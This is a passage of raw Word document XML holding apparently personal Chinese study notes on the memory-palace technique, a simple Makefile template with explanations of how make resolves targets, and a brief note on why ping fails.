        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>距离大小平均；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>空间立体感强。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一个点：顺序一致这个好理解，就是按照顺时针或者是逆时针的方向找，例如房间的地点就是按照个规则找。如果是路上的地点就按照车辆前进的方向找。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二点：距离大小平均。就是说我们要找的地点之间的距离不要过远或者过近。不要上一个地点在北京，下一个在海南岛，再一个是自己家里的。这里讲的“个”不是“组”哦。一组和一组地点之间这个可</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>以不分距离。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二点：大小平均又怎么理解呢？就是我们所找的物品的大小要差不多，不要上一个像大象那么大，下一个像蚂蚁那么小。大那个好记，小的那个就不太好记了。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第三点：空间立体感强是什么意思呢？就是在同一个平面里不能找超过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个地点。例如一面墙，你找了墙壁算一个，可能有个窗口算一个，再来一个窗的另一边算一个，就不要再找了。再找就不好记了。我们要找的物品要有一定的立体空间感，像有个地点是：电脑桌，它是立体的，我们用来记信息时可以放东西在上面的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>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p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>四、灵活运用记忆宫殿</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记忆力有两个基本的组成部分，即图像和位置；图像代表一个人想要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>记住的内容，位置—按照拉丁语里的说法是地点，代表的则是这些图像存储的位置。也就是说，在记忆的时候，要在头脑中形成一个空间，生成一个自己熟悉的、很容易就想到的场所，然后把那些代表着要记住的内容的图像放在这个场所里。罗马人把这种方法叫做“位置记忆法”，这样的场所后来被称为“记忆宫殿”。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虽然被称为记忆宫殿，但并不意味着这样的记忆场所就必须像个宫殿，甚至也不需要是一座建筑物。它可以是一个小镇上的一条路线，就像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的路线一样，也可以是一座火车站，或者是十二星座，甚至可以是神话中的动物。这个场所可大可小，可以在室外也可以在室内，可以是真实的也可以是虚构的，只要你对它们足够熟悉，而且是井然有序的，可以让你把一个地点与临近的一个地点联系起来。曾获得美国记忆力锦标赛</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次冠军的斯科特·海格伍德（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Scott Hagwood</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）利用《建筑学文摘》（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Architectural Digest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）里的豪华房间作为他的宫殿来存储记忆。那位精力充沛的马来西亚记忆力锦标赛冠军义·斯·朱（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Yip Swee Chooi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）博士，他的记忆宫殿是自己的身体。利用自己的身体，他记住了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>56000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个词语、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>17 74</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页的牛津汉英词典。一个人可以拥有几十座、上百座甚至几千座记忆宫殿，每座宫殿都用来储存不同的记忆。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在澳大利亚和美国西南部，土著人和美洲印第安部落里的阿帕切族人发明了他们自己的位置记忆法。他们没有使用建筑物，而是依靠当地的地形地貌画出要叙述的故事内容，或在各种地貌之间穿行，然后唱出这些内容。每个小山丘、每个巨型石头或每条小溪流代表他们故事</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>内容的一部分。约翰·福利（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>John Foley</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）是美国密苏里大学的一位语言人类学家，他研究的领域是记忆和口述传统，他说：“神话和地图可以统一起来。”但是，这种把故事内容嵌入地形地貌的方法最终酿成了一个悲剧，在美国政</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>府把土著人的土地夺走之后，他们在失去自己家园的同时，也失去了他们民族的很多神话传说。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果哪天让你在其他人的房子里单独待上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分钟，在这之前你从来没有到过他家。这个时候，你肯定会感觉精力旺盛，而且对这座房子充满好奇。想象一下，在这短暂的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分钟内，你能记住关于这座房子的多少信息。你不仅仅能记住不同的房间的位置，哪一间与哪一间是挨着的，还能记住这些房间的大小和装饰，还有里面的摆设、房间窗户的位置。在你还没有意识到的时候，你就能记住上百件物品的摆放位置和所有物品的大小尺寸。你甚至都没有意识到你在观察这些物品。如果把这些进入你大脑的所有信息放在一起，都可以写成一个短篇小说了。但是，人们从来不会把这种空间记忆能力当成是自己的记忆成就。人类只是在无意识地大量吸收着这些空间信息。”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记忆宫殿就是要利用人的这种敏锐的空间记忆力，来组织并储存那些没有次序的信息。我们要组织和储存的就是他写下来的那张清单。你马上就会发现，在我把买</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个呼啦圈、一个通气管、一台干冰机和发邮件这几件事情摆放好之后，你很容易就能记住它们。就像在刚刚我们说的那座房子里，你对里面房间的位置能够了然于心一样。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最关键的一步是要选择一座自己最熟悉的记忆宫殿。建议你把从小住到大的房子当做你的第一座记忆宫殿，因为你肯定对它很熟悉。之后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>我们会把清单上的内容围绕这座房子的一条路线一项一项地摆放出来。在记忆这个清单的时候，你只需要在想象中重新把刚才的路线走一遍。希望这些要记忆的物品到时能从你头脑里自动地跳出来。我问你，你小时候住的房子是平房吗？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所有记忆术的通用原则是：大脑对所有信息的记忆程度并不是完全相同的。我们比较容易记住视觉图像，却很难记住其他形式的信息，比如一串单词或数字。因此，记忆术的秘诀就在于形成类似于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的那种天生的联觉记忆方式：把大脑不容易记住的信息类型转化成擅长记忆的信息类型。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A14522" w:rsidRPr="00A14522" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大多数记忆术的核心方法就是把将要进入记忆的那些枯燥的信息，转化为富有色彩和超级有趣的信息，而且转化后的信息要和你以前见过的所有事物有很大的不同，转化之后，你就再也忘不掉了。这就是所谓的精细解码。数字记忆训练、扑克牌记忆训练是掌握记忆术的最普通的训练，之后我们再转向抽象概念的记忆训练。完成这些训练之后，基本上你就能学到任何你想学的信息了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E5BCB" w:rsidRDefault="002E5BCB" w:rsidP="002E5BCB">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>akefile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00830594" w:rsidRDefault="00830594" w:rsidP="00830594">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个模板</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E66EA8" w:rsidRDefault="00E66EA8" w:rsidP="00E66EA8">
      <w:r>
        <w:t>mtarget=test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E66EA8" w:rsidRDefault="00E66EA8" w:rsidP="00E66EA8">
      <w:r>
        <w:t>mobj0=main.cpp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E66EA8" w:rsidRDefault="00E66EA8" w:rsidP="00E66EA8">
      <w:r>
        <w:t>mobj1=/mnt/hgfs/desktop/vmware_share/SCService/cplus/xlfd/xlfd.cpp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E66EA8" w:rsidRDefault="00E66EA8" w:rsidP="00E66EA8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>mobj2=/mnt/hgfs/desktop/vmware_share/SCService/xlfdcommon/xcommon/xcommon.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E66EA8" w:rsidRDefault="00E66EA8" w:rsidP="00E66EA8">
      <w:r>
        <w:t>mobj3=xfun.cpp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E66EA8" w:rsidRDefault="00E66EA8" w:rsidP="00E66EA8">
      <w:r>
        <w:t>clean:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E66EA8" w:rsidRDefault="00E66EA8" w:rsidP="00E66EA8">
      <w:r>
        <w:tab/>
        <w:t>rm -f *.o $(mtarget)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E66EA8" w:rsidRPr="00E66EA8" w:rsidRDefault="00E66EA8" w:rsidP="00E66EA8">
      <w:r>
        <w:tab/>
        <w:t>g++ -o $(mtarget) $(mobj0) $(mobj1) $(mobj2) $(mobj3) -llog4cplus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00830594" w:rsidRPr="00830594" w:rsidRDefault="00830594" w:rsidP="00830594">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重要的几点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E5BCB" w:rsidRDefault="00AB54A0" w:rsidP="002E5BCB">
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> make clean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行的动作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00830594" w:rsidRDefault="00830594" w:rsidP="00830594">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会在当前目录下找名字叫“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Makefile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”或“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>makefile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”的文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00830594" w:rsidRDefault="00830594" w:rsidP="00830594">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果找到，它会找文件中的第一个目标文件（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），在上面的例子中，他会找到“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>edit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”这个文件，并把这个文件作为最终的目标文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00830594" w:rsidRDefault="00830594" w:rsidP="00830594">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>edit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件不存在，或是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>edit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所依赖的后面的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> .o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的文件修改时间要比</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>edit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个文件新，那么，他就会执行后面所定义的命令来生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>edit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00830594" w:rsidRDefault="00830594" w:rsidP="00830594">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>edit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所依赖的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件也存在，那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会在当前文件中找目标为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的依赖性，如果找到则再根据那一个规则生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件。（这有点像一个堆栈的过程）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042051" w:rsidRPr="00042051" w:rsidRDefault="00830594" w:rsidP="00830594">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当然，你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件是存在的啦，于是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> .o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，然后再用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> .o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件声明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的终极任务，也就是执行文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>edit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不通的原因</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没关防火墙</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没打开</w:t>
      </w:r>
      <w:r>
        <w:t>telnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制面板加的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00DE3DF4" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>记忆法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>数字记忆</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="002D383E" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>望远镜</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
